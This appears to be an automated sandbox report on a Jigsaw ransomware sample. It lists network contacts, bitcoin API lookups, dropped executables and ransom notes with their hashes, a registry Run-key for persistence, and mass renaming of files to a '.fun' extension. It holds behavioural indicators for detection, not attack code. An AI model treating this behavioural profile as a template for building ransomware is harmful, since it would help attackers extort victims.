| FR | 178.33.163.107:6893 | udp | |
| FR | 178.33.163.108:6893 | udp | |
| FR | 178.33.163.109:6893 | udp | |
| FR | 178.33.163.110:6893 | udp | |
| FR | 178.33.163.111:6893 | udp | |
| FR | 178.33.163.112:6893 | udp | |
| FR | 178.33.163.113:6893 | udp | |
| FR | 178.33.163.114:6893 | udp | |
| FR | 178.33.163.115:6893 | udp | |
| FR | 178.33.163.116:6893 | udp | |
| FR | 178.33.163.117:6893 | udp | |
| FR | 178.33.163.118:6893 | udp | |
| FR | 178.33.163.119:6893 | udp | |
| FR | 178.33.163.120:6893 | udp | |
| FR | 178.33.163.121:6893 | udp | |
| FR | 178.33.163.122:6893 | udp | |
| FR | 178.33.163.123:6893 | udp | |
| FR | 178.33.163.124:6893 | udp | |
| FR | 178.33.163.125:6893 | udp | |
| FR | 178.33.163.126:6893 | udp | |
| FR | 178.33.163.127:6893 | udp | |
| FR | 178.33.163.128:6893 | udp | |
| FR | 178.33.163.129:6893 | udp | |
| FR | 178.33.163.130:6893 | udp | |
| FR | 178.33.163.131:6893 | udp | |
| FR | 178.33.163.132:6893 | udp | |
| FR | 178.33.163.133:6893 | udp | |
| FR | 178.33.163.134:6893 | udp | |
| FR | 178.33.163.135:6893 | udp | |
| FR | 178.33.163.136:6893 | udp | |
| FR | 178.33.163.137:6893 | udp | |
| FR | 178.33.163.138:6893 | udp | |
| FR | 178.33.163.139:6893 | udp | |
| FR | 178.33.163.140:6893 | udp | |
| FR | 178.33.163.141:6893 | udp | |
| FR | 178.33.163.142:6893 | udp | |
| FR | 178.33.163.143:6893 | udp | |
| FR | 178.33.163.144:6893 | udp | |
| FR | 178.33.163.145:6893 | udp | |
| FR | 178.33.163.146:6893 | udp | |
| FR | 178.33.163.147:6893 | udp | |
| FR | 178.33.163.148:6893 | udp | |
| FR | 178.33.163.149:6893 | udp | |
| FR | 178.33.163.150:6893 | udp | |
| FR | 178.33.163.151:6893 | udp | |
| FR | 178.33.163.152:6893 | udp | |
| FR | 178.33.163.153:6893 | udp | |
| FR | 178.33.163.154:6893 | udp | |
| FR | 178.33.163.155:6893 | udp | |
| FR | 178.33.163.156:6893 | udp | |
| FR | 178.33.163.157:6893 | udp | |
| FR | 178.33.163.158:6893 | udp | |
| FR | 178.33.163.159:6893 | udp | |
| FR | 178.33.163.160:6893 | udp | |
| FR | 178.33.163.161:6893 | udp | |
| FR | 178.33.163.162:6893 | udp | |
| FR | 178.33.163.163:6893 | udp | |
| FR | 178.33.163.164:6893 | udp | |
| FR | 178.33.163.165:6893 | udp | |
| FR | 178.33.163.166:6893 | udp | |
| FR | 178.33.163.167:6893 | udp | |
| FR | 178.33.163.168:6893 | udp | |
| FR | 178.33.163.169:6893 | udp | |
| FR | 178.33.163.170:6893 | udp | |
| FR | 178.33.163.171:6893 | udp | |
| FR | 178.33.163.172:6893 | udp | |
| FR | 178.33.163.173:6893 | udp | |
| FR | 178.33.163.174:6893 | udp | |
| FR | 178.33.163.175:6893 | udp | |
| FR | 178.33.163.176:6893 | udp | |
| FR | 178.33.163.177:6893 | udp | |
| FR | 178.33.163.178:6893 | udp | |
| FR | 178.33.163.179:6893 | udp | |
| FR | 178.33.163.180:6893 | udp | |
| FR | 178.33.163.181:6893 | udp | |
| FR | 178.33.163.182:6893 | udp | |
| FR | 178.33.163.183:6893 | udp | |
| FR | 178.33.163.184:6893 | udp | |
| FR | 178.33.163.185:6893 | udp | |
| FR | 178.33.163.186:6893 | udp | |
| FR | 178.33.163.187:6893 | udp | |
| FR | 178.33.163.188:6893 | udp | |
| FR | 178.33.163.189:6893 | udp | |
| FR | 178.33.163.190:6893 | udp | |
| FR | 178.33.163.191:6893 | udp | |
| FR | 178.33.163.192:6893 | udp | |
| FR | 178.33.163.193:6893 | udp | |
| FR | 178.33.163.194:6893 | udp | |
| FR | 178.33.163.195:6893 | udp | |
| FR | 178.33.163.196:6893 | udp | |
| FR | 178.33.163.197:6893 | udp | |
| FR | 178.33.163.198:6893 | udp | |
| FR | 178.33.163.199:6893 | udp | |
| FR | 178.33.163.200:6893 | udp | |
| FR | 178.33.163.201:6893 | udp | |
| FR | 178.33.163.202:6893 | udp | |
| FR | 178.33.163.203:6893 | udp | |
| FR | 178.33.163.204:6893 | udp | |
| FR | 178.33.163.205:6893 | udp | |
| FR | 178.33.163.206:6893 | udp | |
| FR | 178.33.163.207:6893 | udp | |
| FR | 178.33.163.208:6893 | udp | |
| FR | 178.33.163.209:6893 | udp | |
| FR | 178.33.163.210:6893 | udp | |
| FR | 178.33.163.211:6893 | udp | |
| FR | 178.33.163.212:6893 | udp | |
| FR | 178.33.163.213:6893 | udp | |
| FR | 178.33.163.214:6893 | udp | |
| FR | 178.33.163.215:6893 | udp | |
| FR | 178.33.163.216:6893 | udp | |
| FR | 178.33.163.217:6893 | udp | |
| FR | 178.33.163.218:6893 | udp | |
| FR | 178.33.163.219:6893 | udp | |
| FR | 178.33.163.220:6893 | udp | |
| FR | 178.33.163.221:6893 | udp | |
| FR | 178.33.163.222:6893 | udp | |
| FR | 178.33.163.223:6893 | udp | |
| FR | 178.33.163.224:6893 | udp | |
| FR | 178.33.163.225:6893 | udp | |
| FR | 178.33.163.226:6893 | udp | |
| FR | 178.33.163.227:6893 | udp | |
| FR | 178.33.163.228:6893 | udp | |
| FR | 178.33.163.229:6893 | udp | |
| FR | 178.33.163.230:6893 | udp | |
| FR | 178.33.163.231:6893 | udp | |
| FR | 178.33.163.232:6893 | udp | |
| FR | 178.33.163.233:6893 | udp | |
| FR | 178.33.163.234:6893 | udp | |
| FR | 178.33.163.235:6893 | udp | |
| FR | 178.33.163.236:6893 | udp | |
| FR | 178.33.163.237:6893 | udp | |
| FR | 178.33.163.238:6893 | udp | |
| FR | 178.33.163.239:6893 | udp | |
| FR | 178.33.163.240:6893 | udp | |
| FR | 178.33.163.241:6893 | udp | |
| FR | 178.33.163.242:6893 | udp | |
| FR | 178.33.163.243:6893 | udp | |
| FR | 178.33.163.244:6893 | udp | |
| FR | 178.33.163.245:6893 | udp | |
| FR | 178.33.163.246:6893 | udp | |
| FR | 178.33.163.247:6893 | udp | |
| FR | 178.33.163.248:6893 | udp | |
| FR | 178.33.163.249:6893 | udp | |
| FR | 178.33.163.250:6893 | udp | |
| FR | 178.33.163.251:6893 | udp | |
| FR | 178.33.163.252:6893 | udp | |
| FR | 178.33.163.253:6893 | udp | |
| FR | 178.33.163.254:6893 | udp | |
| FR | 178.33.163.255:6893 | udp | |
| US | 8.8.8.8:53 | api.blockcypher.com | udp |
| US | 104.20.99.10:80 | api.blockcypher.com | tcp |
| US | 8.8.8.8:53 | btc.blockr.io | udp |
| US | 8.8.8.8:53 | bitaps.com | udp |
| NL | 178.128.255.179:443 | bitaps.com | tcp |
| US | 8.8.8.8:53 | chain.so | udp |
| US | 172.67.40.90:443 | chain.so | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 88.221.134.146:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:80 | www.microsoft.com | tcp |
Files
memory/2148-0-0x0000000001BC0000-0x0000000001BF1000-memory.dmp
memory/2148-1-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2148-2-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2148-5-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2148-108-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2148-116-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2148-131-0x0000000000400000-0x0000000000435000-memory.dmp
C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___PXAGF_.hta
| MD5 | 3face2e9a0a3e60fdc9930a84c771f88 |
| SHA1 | 932f2a9836a7413fc1a37a27c9f7c2a8ce4a9488 |
| SHA256 | de0766fb328358d862ac96ab7eabd1c039f287357d0a5635afaf1efb2263a51e |
| SHA512 | b30a66715d06170994502b8f49d1d73b6e178a17671a64a966d7e50cc992691e6c64a091cbf726841ee5190e770e9e32c78c727a6a1c564ce1d5365926163381 |
C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___MMBXD_.txt
| MD5 | ce6750350f546e259e494549bfd53282 |
| SHA1 | 5b2ae19bdfd94cfec9b4919e3a340d02cc40177b |
| SHA256 | 5716236fc215ed32b2bb079d848911d5a02e42eeef64205bf4b4ae432f69ef6c |
| SHA512 | b7fbaae8aa4d2155a367aea27e23506e9e6053bf6ea6637265d9418a0c4a7f06b161f626951c0092b4c2939f1a9e245e22a4d69fbc6bc525b52368fd8928fb6e |
memory/2148-152-0x0000000000440000-0x0000000000451000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab85C.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar87E.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win10v2004-20241007-en
Max time kernel
121s
Max time network
137s
Command Line
Signatures
Jigsaw Ransomware
Jigsaw family
Renames multiple (3738) files with added filename extension
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\PhotosAppList.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarSmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_PigEar.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adobe_spinner.gif.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Date.targetsize-16_contrast-white.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-180.png.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\download.svg.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sl-si\ui-strings.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedMedTile.scale-200_contrast-black.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-48_altform-unplated.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vreg\excel.x-none.msi.16.x-none.vreg.dat.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\Assets\GameBar_MedTile.scale-200.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OrientationControlMiddleCircle.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\WideTile.scale-200.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarSplashLogo.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\share_icons.png.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SplashWideTile.scale-125_contrast-black.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-64.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-24.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-180.png.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\EssentialReport.dotx | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosMedTile.scale-125.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSmallTile.scale-150.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\javaws.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-16.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageStoreLogo.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SkypeTile.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailBadge.scale-400.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-48_contrast-black.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubSplashScreen.scale-125_contrast-high.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\ui-strings.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\NEWS.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\offer_cards\credit-illustration.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-30_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\protect_poster.jpg | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.targetsize-32.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Generic-Dark.scale-125.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\PeopleLargeTile.scale-125.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\WideTile.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\NavigationIcons\nav_icons_connect.targetsize-48.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\editpdf.svg | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\selector.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_2x.gif | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MicrosoftLogo.scale-200.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\bun.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\PlayStore_icon.svg.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\WorldClockWideTile.contrast-white_scale-200.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\LibrarySquare150x150Logo.scale-125.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-30_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_contrast-white.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ms_get.svg | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_ru_135x40.svg.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\Media Renderer\DMR_48.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4308 wrote to memory of 2700 | N/A | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
| PID 4308 wrote to memory of 2700 | N/A | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\jigsaw.exe
"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
memory/4308-0-0x00007FFA10695000-0x00007FFA10696000-memory.dmp
memory/4308-1-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp
memory/4308-2-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp
memory/4308-3-0x0000000000FC0000-0x0000000000FF8000-memory.dmp
memory/4308-4-0x000000001BC70000-0x000000001C13E000-memory.dmp
memory/4308-5-0x000000001C140000-0x000000001C1DC000-memory.dmp
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
| MD5 | 2773e3dc59472296cb0024ba7715a64e |
| SHA1 | 27d99fbca067f478bb91cdbcb92f13a828b00859 |
| SHA256 | 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7 |
| SHA512 | 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262 |
memory/2700-20-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp
memory/4308-19-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp
memory/2700-21-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp
memory/2700-22-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp
memory/2700-23-0x0000000001B20000-0x0000000001B28000-memory.dmp
memory/2700-24-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{7F749844-947B-4478-8F9D-D28653FCFB29} - OProcSessId.dat.fun
| MD5 | 8ebcc5ca5ac09a09376801ecdd6f3792 |
| SHA1 | 81187142b138e0245d5d0bc511f7c46c30df3e14 |
| SHA256 | 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880 |
| SHA512 | cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650 |
C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\invalid32x32.gif.fun
| MD5 | 580ee0344b7da2786da6a433a1e84893 |
| SHA1 | 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e |
| SHA256 | 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513 |
